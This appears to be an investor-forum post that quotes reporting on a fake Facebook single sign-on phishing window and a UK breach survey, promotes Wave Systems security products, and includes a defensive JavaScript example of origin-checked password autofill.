Single sign-on, or SSO, is a feature that allows people to use their accounts on other sites—typically Facebook, Google, LinkedIn, or Twitter—to log in to third-party websites. SSO is designed to make things easier for both end users and websites. Rather than having to create and remember a password for hundreds or even thousands of third-party sites, people can log in using the credentials for a single site. Websites that don’t want to bother creating and securing password-based authentication systems need only access an easy-to-use programming interface. Security and cryptographic mechanisms under the hood allow the login to happen without the third-party site ever seeing the username and password.
Researchers with password manager service Myki recently found a site that purported to offer SSO from Facebook. As the video below shows, the login window looked almost identical to the real Facebook SSO. This one, however, didn’t run on the Facebook API and didn’t interface with the social network in any way. Instead, it phished the username and password.
Just add HTML
One of the ingredients that made the login window look so real is that it almost perfectly reproduced what users would see if they were encountering a genuine Facebook SSO, such as the one to the right of this text. The status bar, navigation bar, shadows, and HTTPS-based Facebook address all appear almost exactly the same. The Window presented on the phishing page, however, was rendered using a block of HTML, rather than by calling an API that opens a real Facebook window. As a result, anything typed into the fake SSO page was funneled directly to the phishers.
While the replica is convincing, there was one easy way any user could immediately tell it was a fake. Genuine SSOs from Facebook and Google can be dragged outside of the Window of the third-party site without any part of the login prompt disappearing. Portions of the fake SSO, by contrast, disappeared when doing this. Another tell-tale sign for Myki users, and likely users of other password managers, was that the autofill feature of the password manager didn’t work, since contrary to the address showing in the HTML block, the actual URL the users were visiting wasn’t from Facebook. More advanced users almost certainly could have spotted the forgery by viewing the source code of the site they were visiting, too.
The convincing forgery is yet another reminder that attacks only get better. It also reaffirms the value of using multi-factor authentication on any site that offers it. A password phished from a Facebook account that used MFA protection would have been of little use to attackers since they wouldn’t have had the physical key or smartphone that’s required when logging in from a computer that has never accessed the account before. Facebook has more tips for dealing with phishing here.
==================================================================
Here are a couple of Wave Solutions that could have a positive impact on this Facebook problem:
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Key Features:
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
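The Ars Technica article above notes that Myki's autofill refused the fake Facebook SSO because the real page URL was not Facebook's, whatever the HTML block painted on screen. The following is an added example, not code from the article, Myki or Wave, of that origin-binding check as a password manager would apply it; the vault contents and the test URLs are constructed.

```javascript
// Added example: why origin-bound autofill ignores a look-alike SSO page.
// A credential is stored against the origin it was saved on, and the decision
// uses the browser's real page URL, never the address text drawn inside the page.

// Constructed sample vault: one credential saved on the genuine Facebook origin.
const VAULT = [
  { origin: "https://www.facebook.com", user: "alice@example.com" },
];

// Reduce a URL to its origin (scheme + host + port). Throws on non-URLs so a
// garbage address can never accidentally match a stored credential.
function originOf(url) {
  return new URL(url).origin;
}

// Return the credential to offer for the page at `pageUrl`, or null.
// Only an exact origin match counts: a look-alike host such as
// "www.facebook.com.sso-example.test", a different site that merely renders a
// Facebook-styled window, or a plain-http copy of the real host all get nothing.
function credentialFor(pageUrl, vault = VAULT) {
  let pageOrigin;
  try {
    pageOrigin = originOf(pageUrl);
  } catch (e) {
    return null; // not a parseable URL
  }
  if (!pageOrigin.startsWith("https:")) return null; // never autofill over plain http
  return vault.find((c) => originOf(c.origin) === pageOrigin) || null;
}

// Constructed cases mirroring the tell described in the article.
const CASES = [
  "https://www.facebook.com/login.php?next=%2F",        // genuine host: autofill
  "https://www.facebook.com.sso-example.test/login",    // look-alike subdomain: no
  "https://sso-example.test/facebook-login.html",       // fake SSO window in HTML: no
  "http://www.facebook.com/login.php",                  // downgraded scheme: no
];
for (const url of CASES) {
  const cred = credentialFor(url);
  console.log(cred ? `${url} -> autofill ${cred.user}` : `${url} -> no autofill`);
}
```

The same comparison is what makes an SSO popup that is a real, separate browser window trustworthy: its origin is checked by the browser, not read off a rendered status bar.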
88% of UK businesses breached during the last 12 months
https://www.helpnetsecurity.com/2019/02/12/uk-breaches-increasing/
The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black.
Key survey research findings:
• 88% of UK organizations reported suffering a breach in the last 12 months
• The average number of breaches per organization over the past year was 3.67
• 87% of organizations have seen an increase in attack volumes
• 89% of organizations say attacks have become more sophisticated
• 93% of organizations plan to increase spending on cyber defence
Compared with the previous report, published in September, the average number of breaches has increased from 3.48 to 3.67. More than 5% of organizations have seen an increase in attack volumes.
100% of Government and Local Authority organizations surveyed reported being breached in the past 12 months, suffering 4.65 breaches, on average. 40% have been breached more than five times. In the private sector, the survey indicates that Financial Services are the most likely to report a breach, with 98% of the surveyed companies reporting breaches during the past 12 months.
“We believe our second UK threat report underlines that UK organizations are still under intense pressure from escalating cyberattacks,” said Rick McElroy, Head of Security Strategy for Carbon Black. “The report suggests that the average number of breaches has increased, but as threat hunting strategies start to mature, we hope to see fewer attacks making it to full breach status.”
The weakest link in cybersecurity: humans
According to the report, malware remains the most prolific attack type in the UK, with more than a quarter (27%) of organizations naming it the most commonly encountered. Ransomware holds second position (15%). However, the human factor plays a part in the attacks resulting in breaches.
Phishing attacks appear to be at the root of one in five successful breaches. Combined, weaknesses in processes and outdated security technology were reported factors in a quarter of breaches, indicating that failures in basic security hygiene continue to be high risk vectors that organizations should address as a priority.
Cyber defence investment increases in the face of increasing attack volumes
Organizations across all sectors reported increases in the volume of attacks during the past 12 months. However, of the organizations surveyed Government and Local Authority organizations saw particularly high increases, with 40% noting more than 50% increase in the number of attacks. Similarly, in Healthcare, 29% of respondents noted increases of 50% or more.
A silver lining here is that 6% more of the organizations plan to increase cybersecurity spending compared to six months ago.
Threat hunting is delivering on its promise
60% of UK organizations surveyed said they are actively threat hunting and more than a quarter (26%) have been doing so for a year or more. A very encouraging 95% reported that threat hunting has strengthened their defences. The survey results suggest that threat hunting is most mature in the financial services sector, with 53% threat hunting for more than a year.
“We believe threat hunting is an integral part of a mature security posture,” McElroy said. “It’s encouraging to see these numbers continuing to climb.”
=================================================================
Given the success rate of cybersecurity technology implied in the title of this article, why not use solutions such as Wave's to get the job done!
Problem                       Solution
Malware                       Wave Endpoint Monitor
Ransomware                    SEDs and Wave SED Management
Phishing attacks              Wave VSC 2.0
Unknown devices on network    Wave ERAS
=================================================================
These links have great summaries for the applicable Wave's solutions above:
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
=================================================================
*** Post #245613 has information on ransomware.
The Drive Trust Alliance PR below on ransomware explains further. Wave SED management can remotely initialize the SED drive. From the article below: "If these are properly initialized, there is little or no danger of these ransomware attacks."
Drive Trust Alliance Announces Free Fix for Lurking Ransomware Threats
https://www.prnewswire.com/news-releases/drive-trust-alliance-announces-free-fix-for-lurking-ransomware-threats-300569969.html